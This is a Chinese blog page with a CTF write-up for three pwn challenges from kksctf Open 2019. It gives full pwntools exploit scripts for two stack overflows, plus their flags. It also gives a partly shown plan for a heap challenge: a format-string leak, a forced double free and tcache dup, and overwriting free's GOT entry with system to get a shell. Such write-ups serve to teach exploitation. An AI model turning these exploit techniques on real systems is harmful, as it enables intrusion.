<!DOCTYPE html>

<html lang="zh-Hans">

<head><meta name="generator" content="Hexo 3.9.0">



    <!--[if lt IE 9]>

        <style>body {display: none; background: none !important} </style>

        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />

    <![endif]-->



<meta charset="utf-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

<meta name="format-detection" content="telephone=no">

<meta name="author" content="binLep">







<meta name="description" content="可以看出大家都在期末考试">

<meta name="keywords" content="Pwn">

<meta property="og:type" content="article">

<meta property="og:title" content="【WriteUp】#kksctf Open 2019--Pwn题解">

<meta property="og:url" content="https://binlep.github.io/old_blog_01/2019/12/30/【WriteUp】kksctf open 2019--Pwn题解/index.html">

<meta property="og:site_name" content="binLep&#39;s Blog">

<meta property="og:description" content="可以看出大家都在期末考试">

<meta property="og:locale" content="zh-Hans">

<meta property="og:image" content="https://raw.githubusercontent.com/binLep/BlogImages/master/%23kksctf%20open%202019/9oagyn3.png">

<meta property="og:updated_time" content="2019-12-31T01:48:30.189Z">

<meta name="twitter:card" content="summary">

<meta name="twitter:title" content="【WriteUp】#kksctf Open 2019--Pwn题解">

<meta name="twitter:description" content="可以看出大家都在期末考试">

<meta name="twitter:image" content="https://raw.githubusercontent.com/binLep/BlogImages/master/%23kksctf%20open%202019/9oagyn3.png">



<link rel="apple-touch-icon" href="/old_blog_01/apple-touch-icon.png">





    <link rel="alternate" href="/old_blog_01/atom.xml" title="binLep&#39;s Blog" type="application/atom+xml">







    <link rel="shortcut icon" href="/old_blog_01/favicon.png">







    <link href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.1/animate.min.css" rel="stylesheet">







    <link href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">







    <script src="//cdnjs.cloudflare.com/ajax/libs/pace/1.0.2/pace.min.js"></script>

    <link href="//cdnjs.cloudflare.com/ajax/libs/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">





<link rel="stylesheet" href="../../../../css/style.css">







<link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">





<title>【WriteUp】#kksctf Open 2019--Pwn题解 | binLep&#39;s Blog</title>



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/clipboard.js/1.5.10/clipboard.min.js"></script>



<script>

    var yiliaConfig = {

        fancybox: true,

        animate: true,

        isHome: false,

        isPost: true,

        isArchive: false,

        isTag: false,

        isCategory: false,

        fancybox_js: "//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.5/jquery.fancybox.min.js",

        scrollreveal: "//cdnjs.cloudflare.com/ajax/libs/scrollReveal.js/3.1.4/scrollreveal.min.js",

        search: true

    }

</script>





    <script>

        yiliaConfig.jquery_ui = [true, "//cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js", "//cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.4/css/jquery-ui.min.css"];

    </script>







    <script> yiliaConfig.rootUrl = "\/";</script>













</head></html>

<body>

  <div id="container">

    <div class="left-col">

    <div class="overlay"></div>

<div class="intrude-less">

    <header id="header" class="inner">

        <a href="/old_blog_01/" class="profilepic">

            <img src="/old_blog_01/img/avatar.png" class="animated zoomIn">

        </a>

        <hgroup>

          <h1 class="header-author"><a href="/old_blog_01/">binLep</a></h1>

        </hgroup>



        

        <p class="header-subtitle">图片托管在github，国内访问会很慢QWQ</p>

        



        

            <form id="search-form">

            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="" />

            <i class="fa fa-times" onclick="resetSearch()"></i>

            </form>

            <div id="local-search-result"></div>

            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>

        





        

            <div id="switch-btn" class="switch-btn">

                <div class="icon">

                    <div class="icon-ctn">

                        <div class="icon-wrap icon-house" data-idx="0">

                            <div class="birdhouse"></div>

                            <div class="birdhouse_holes"></div>

                        </div>

                        <div class="icon-wrap icon-ribbon hide" data-idx="1">

                            <div class="ribbon"></div>

                        </div>

                        

                        

                        <div class="icon-wrap icon-me hide" data-idx="3">

                            <div class="user"></div>

                            <div class="shoulder"></div>

                        </div>

                        

                    </div>

                    

                </div>

                <div class="tips-box hide">

                    <div class="tips-arrow"></div>

                    <ul class="tips-inner">

                        <li>菜单</li>

                        <li>标签</li>

                        

                        

                        <li>关于我</li>

                        

                    </ul>

                </div>

            </div>

        



        <div id="switch-area" class="switch-area">

            <div class="switch-wrap">

                <section class="switch-part switch-part1">

                    <nav class="header-menu">

                        <ul>

                        

                            <li><a href="../../../../index.html">主页</a></li>

                        

                            <li><a href="../../../../archives/">所有文章</a></li>

                        

                            <li><a href="../../../../tags/">标签云</a></li>

                        

                            <li><a href="../../../../about/">关于我</a></li>

                        

                            <li><a href="../../../../friends/">友情链接</a></li>

                        

                        </ul>

                    </nav>

                    <nav class="header-nav">

                        <ul class="social">

                            

                                <a class="fa Email" href="mailto:1723569975@qq.com" title="Email"></a>

                            

                                <a class="fa RSS" href="../../../../atom.xml" title="RSS"></a>

                            

                        </ul>

                    </nav>

                </section>

                

                

                <section class="switch-part switch-part2">

                    <div class="widget tagcloud" id="js-tagcloud">

                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/BugkuCTF/">BugkuCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/CryptixCTF/">CryptixCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Event/">Event</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Hackme-CTF/">Hackme CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Jarvis-OJ/">Jarvis OJ</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Linux-Pwn/">Linux Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/MOCTF/">MOCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Newark-Academy-CTF/">Newark Academy CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Platform/">Platform</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Platfrom/">Platfrom</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Pwn/">Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/RSA/">RSA</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/RSCTF/">RSCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Web/">Web</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/Windows-Pwn/">Windows Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/XMan/">XMan</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/mipsel/">mipsel</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/ret2libc/">ret2libc</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/ret2shellcode/">ret2shellcode</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/xml注入/">xml注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/使用教程/">使用教程</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/安装教程/">安装教程</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/搭建Hexo/">搭建Hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/攻防世界/">攻防世界</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/模板/">模板</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/玄武杯/">玄武杯</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/环境搭建/">环境搭建</a></li><li class="tag-list-item"><a class="tag-list-link" href="../../../../tags/问题汇总/">问题汇总</a></li></ul>

                    </div>

                </section>

                

                

                



                

                

                <section class="switch-part switch-part3">

                

                    <div id="js-aboutme">Pwn路上的小萌新~</div>

                </section>

                

            </div>

        </div>

    </header>                

</div>

    </div>

    <div class="mid-col">

      <nav id="mobile-nav">

      <div class="overlay">

          <div class="slider-trigger"></div>

          <h1 class="header-author js-mobile-header hide"><a href="/old_blog_01/" title="回到主页">binLep</a></h1>

      </div>

    <div class="intrude-less">

        <header id="header" class="inner">

            <a href="/old_blog_01/" class="profilepic">

                <img src="/old_blog_01/img/avatar.png" class="animated zoomIn">

            </a>

            <hgroup>

              <h1 class="header-author"><a href="/old_blog_01/" title="回到主页">binLep</a></h1>

            </hgroup>

            

            <p class="header-subtitle">图片托管在github，国内访问会很慢QWQ</p>

            

            <nav class="header-menu">

                <ul>

                

                    <li><a href="../../../../index.html">主页</a></li>

                

                    <li><a href="../../../../archives/">所有文章</a></li>

                

                    <li><a href="../../../../tags/">标签云</a></li>

                

                    <li><a href="../../../../about/">关于我</a></li>

                

                    <li><a href="../../../../friends/">友情链接</a></li>

                

                <div class="clearfix"></div>

                </ul>

            </nav>

            <nav class="header-nav">

                        <ul class="social">

                            

                                <a class="fa Email" target="_blank" href="mailto:1723569975@qq.com" title="Email"></a>

                            

                                <a class="fa RSS" target="_blank" href="../../../../atom.xml" title="RSS"></a>

                            

                        </ul>

            </nav>

        </header>                

    </div>

    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>

</nav>

      <div class="body-wrap"><article id="post-【WriteUp】kksctf open 2019--Pwn题解" class="article article-type-post" itemscope itemprop="blogPost">

  

    <div class="article-meta">

      <a href="" class="article-date">

      <time datetime="2019-12-30T15:22:00.000Z" itemprop="datePublished">2019-12-30</time>

</a>





    </div>

  

  <div class="article-inner">

    

      <input type="hidden" class="isFancy" />

    

    

      <header class="article-header">

        

  

    <h1 class="article-title" itemprop="name">

      【WriteUp】#kksctf Open 2019--Pwn题解

    </h1>

  



      </header>

      

      <div class="article-info article-info-post">

        

    <div class="article-category tagcloud">

    <a class="article-category-link" href="../../../../categories/WriteUp/">WriteUp</a>

    </div>





        

    <div class="article-tag tagcloud">

        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="../../../../tags/Pwn/">Pwn</a></li></ul>

    </div>



        <div class="clearfix"></div>

      </div>

      

    

    <div class="article-entry" itemprop="articleBody">

      

          

        <p>可以看出大家都在期末考试</p>

<a id="more"></a>



<h2 id="Baby-buffer-overflow"><a href="#Baby-buffer-overflow" class="headerlink" title="Baby buffer overflow"></a>Baby buffer overflow</h2><h3 id="Description"><a href="#Description" class="headerlink" title="Description:"></a>Description:</h3><blockquote>

<p>We received new message from kackers. They laugh at us being sure that no one will ever be able to break them and even left a description of what needs to be done. Show them what happens to overly confident people!<br><br>nc tasks.open.kksctf.ru 10002<br><br><a href="https://drive.google.com/open?id=1xSswzDDa0lhtGZ2zfhkRr_kNHD0pcdIy" target="_blank" rel="noopener">https://drive.google.com/open?id=1xSswzDDa0lhtGZ2zfhkRr_kNHD0pcdIy</a><br><br>@oldwayfarer<br></p>

</blockquote>

<hr>

<h3 id="Solution"><a href="#Solution" class="headerlink" title="Solution:"></a>Solution:</h3><p>基础的地址覆盖问题</p>

<p><strong>exp如下：</strong></p>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"amd64"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./baby_bof'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">'tasks.open.kksctf.ru'</span>, <span class="number">10002</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p, "b *0x08048616\nc")</span></span><br><span class="line">pd = <span class="string">'\x00'</span> * <span class="number">0x104</span></span><br><span class="line">pd += p32(<span class="number">0x080485F6</span>)</span><br><span class="line">pd += p32(<span class="number">0xCAFEBABE</span>)</span><br><span class="line">pd += p32(<span class="number">0xCAFEBABE</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Enter your name: '</span>, pd)</span><br><span class="line">p.recvuntil(<span class="string">'Here it comes: '</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<hr>

<h3 id="Flag"><a href="#Flag" class="headerlink" title="Flag:"></a>Flag:</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kks&#123;0v3rf10w_15_my_1!f3&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Insane-pwn"><a href="#Insane-pwn" class="headerlink" title="Insane pwn"></a>Insane pwn</h2><h3 id="Description-1"><a href="#Description-1" class="headerlink" title="Description:"></a>Description:</h3><blockquote>

<p>There supposed to be some uncrackable badass pwn, but, you know, all this festive mood around and i am a kind fellow, so just for this time take easy one instead…let it be our little secret. Happy New Year! :)<br><br>nc tasks.open.kksctf.ru 10003<br><br><a href="https://drive.google.com/open?id=1FaEc0QH_7zvSDQNgJcVwRf3F1dQptp-d" target="_blank" rel="noopener">https://drive.google.com/open?id=1FaEc0QH_7zvSDQNgJcVwRf3F1dQptp-d</a><br><br>@oldwayfarer</p>

</blockquote>

<hr>

<h3 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution:"></a>Solution:</h3><p>仍旧是基础的地址覆盖问题</p>

<p><strong>exp如下：</strong></p>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"amd64"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./insane_pwn'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">'tasks.open.kksctf.ru'</span>, <span class="number">10003</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p, "b *0x08048616\nc")</span></span><br><span class="line">pd = <span class="string">'\x00'</span> * <span class="number">0x100</span>  <span class="comment"># 这里本地是0x104，远程是0x100</span></span><br><span class="line">pd += p32(<span class="number">0xCAFEBABE</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Can you lead me to segmentation fault please?\n'</span>, pd)</span><br><span class="line">p.recvuntil(<span class="string">'Thank you! you can have your flag: '</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<hr>

<h3 id="Flag-1"><a href="#Flag-1" class="headerlink" title="Flag:"></a>Flag:</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kks&#123;W0w_th15_w@5_4w350m3!&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Heap-Heap-Hooray"><a href="#Heap-Heap-Hooray" class="headerlink" title="Heap-Heap-Hooray!"></a>Heap-Heap-Hooray!</h2><h3 id="Description-2"><a href="#Description-2" class="headerlink" title="Description:"></a>Description:</h3><blockquote>

<p><img src="https://raw.githubusercontent.com/binLep/BlogImages/master/%23kksctf%20open%202019/9oagyn3.png" alt="Image"><br><br>P.S. glibc2.27 is the greatest version of glibc!<br><br>nc tasks.open.kksctf.ru 10000<br><br>lib: <a href="https://drive.google.com/open?id=1cpyWT_cRu2szV2u4lpp5ESgMMXUP3IMu" target="_blank" rel="noopener">https://drive.google.com/open?id=1cpyWT_cRu2szV2u4lpp5ESgMMXUP3IMu</a><br>heap: <a href="https://drive.google.com/open?id=1Cnx-VBufgdowFXvE7iIPc6mBZRbnZc7W" target="_blank" rel="noopener">https://drive.google.com/open?id=1Cnx-VBufgdowFXvE7iIPc6mBZRbnZc7W</a><br>df: <a href="https://drive.google.com/open?id=1TRfyx8-5DZrQ70ah8eKLTCbxFT4vBAWj" target="_blank" rel="noopener">https://drive.google.com/open?id=1TRfyx8-5DZrQ70ah8eKLTCbxFT4vBAWj</a></p>

</blockquote>

<hr>

<h3 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution:"></a>Solution:</h3><p>这题才 7 解，大家肯定是都在复习了</p>

<p>保护这里我没用上 shellcode，emmmm</p>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    No RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX disabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br><span class="line">RWX:      Has RWX segments</span><br></pre></td></tr></table></figure>



<p>一道格式化字符串漏洞利用题</p>

<p>程序存在 UAF 漏洞，但是限制了申请的堆块大小不能超过 0x80，这就导致了不能 unlink</p>

<p>函数如下：</p>

<p><strong>1.allocate_chunk</strong></p>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">signed</span> <span class="keyword">int</span> __<span class="function">cdecl <span class="title">allocate_chunk</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// esi</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [esp+4h] [ebp-14h]</span></span><br><span class="line">  <span class="keyword">size_t</span> size; <span class="comment">// [esp+8h] [ebp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v5; <span class="comment">// [esp+Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Enter chunk ID: "</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v3);</span><br><span class="line">  <span class="keyword">if</span> ( v3 &gt;= <span class="number">0</span> &amp;&amp; v3 &lt;= <span class="number">31</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( *a1 &amp; (<span class="number">1</span> &lt;&lt; v3) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">"Chunk with %d ID is already allocated\n"</span>, v3);</span><br><span class="line">      result = <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">"Enter chunk size: "</span>);</span><br><span class="line">      __isoc99_scanf(<span class="string">"%d"</span>, &amp;size);</span><br><span class="line">      <span class="keyword">if</span> ( (<span class="keyword">signed</span> <span class="keyword">int</span>)size &gt; <span class="number">0</span> &amp;&amp; (<span class="keyword">signed</span> <span class="keyword">int</span>)size &lt;= <span class="number">128</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        *a1 |= <span class="number">1</span> &lt;&lt; v3;</span><br><span class="line">        v2 = v3;</span><br><span class="line">        chunks[v2] = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(size);</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Your message: "</span>);</span><br><span class="line">        <span class="keyword">while</span> ( getc(<span class="built_in">stdin</span>) != <span class="number">10</span> )</span><br><span class="line">          ;</span><br><span class="line">        fgets(chunks[v3], size, <span class="built_in">stdin</span>);</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Done!"</span>);</span><br><span class="line">        result = <span class="number">0</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"size must be in range from 1 to 128"</span>);</span><br><span class="line">        result = <span class="number">-1</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"ID must be in range from 0 to 31"</span>);</span><br><span class="line">    result = <span class="number">-1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p><strong>2.delete_chunk</strong></p>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">signed</span> <span class="keyword">int</span> __<span class="function">cdecl <span class="title">delete_chunk</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [esp+4h] [ebp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// [esp+8h] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Enter chunk ID: "</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v2);</span><br><span class="line">  <span class="keyword">if</span> ( v2 &lt; <span class="number">0</span> || v2 &gt; <span class="number">31</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"ID must be in range from 0 to 31"</span>);</span><br><span class="line">    result = <span class="number">-1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( *a1 &amp; (<span class="number">1</span> &lt;&lt; v2) )</span><br><span class="line">  &#123;</span><br><span class="line">    *a1 ^= <span class="number">1</span> &lt;&lt; v2;</span><br><span class="line">    <span class="built_in">free</span>(chunks[v2]);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Done!"</span>);</span><br><span class="line">    result = <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Chunk with %d ID is not allocated\n"</span>, v2);</span><br><span class="line">    result = <span class="number">-1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p><strong>3.list_chunks_content</strong></p>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">list_chunks_content</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [esp+0h] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">31</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    result = *a1 &amp; (<span class="number">1</span> &lt;&lt; i);</span><br><span class="line">    <span class="keyword">if</span> ( result )</span><br><span class="line">      result = <span class="built_in">printf</span>(chunks[i]);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>可以看出程序是靠着位运算来判断一个堆是否已经被释放了，主要代码就是<code>*a1 &amp; (1 &lt;&lt; i)</code></p>

<p>假设 1 - 8 号堆都处于使用状态，0 号堆被释放了</p>

<p>在内存里就会存着这样一个二进制数 111111110，转换成 16 进制就是 0x1fe</p>

<p>存着这个数值的地址可以利用格式化字符串修改，其偏移是 6</p>

<p>那么我们一开始利用格式化字符串漏洞泄露出 libc 的基地址，之后再释放一个堆</p>

<p>利用上述的地址把判断堆块释放的地址改成相应的数值，使之前释放的堆的二进制数位上再次变为 1，就可以再次释放相同堆块</p>

<p>然后就是简单的 tcache dup 了，改写 got_free 为 addr_system，再释放一个写有<code>/bin/sh</code>的字符串即可提权</p>

<p><strong>exp如下：</strong></p>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"><span class="comment"># context(log_level="debug", arch="i386", os="linux")</span></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./df'</span>)</span><br><span class="line">    libc = ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">'tasks.open.kksctf.ru'</span>, <span class="number">10000</span>)</span><br><span class="line">    libc = ELF(<span class="string">'./libc.so.6'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">elf = ELF(<span class="string">'./df'</span>, checksec=<span class="literal">False</span>)</span><br><span 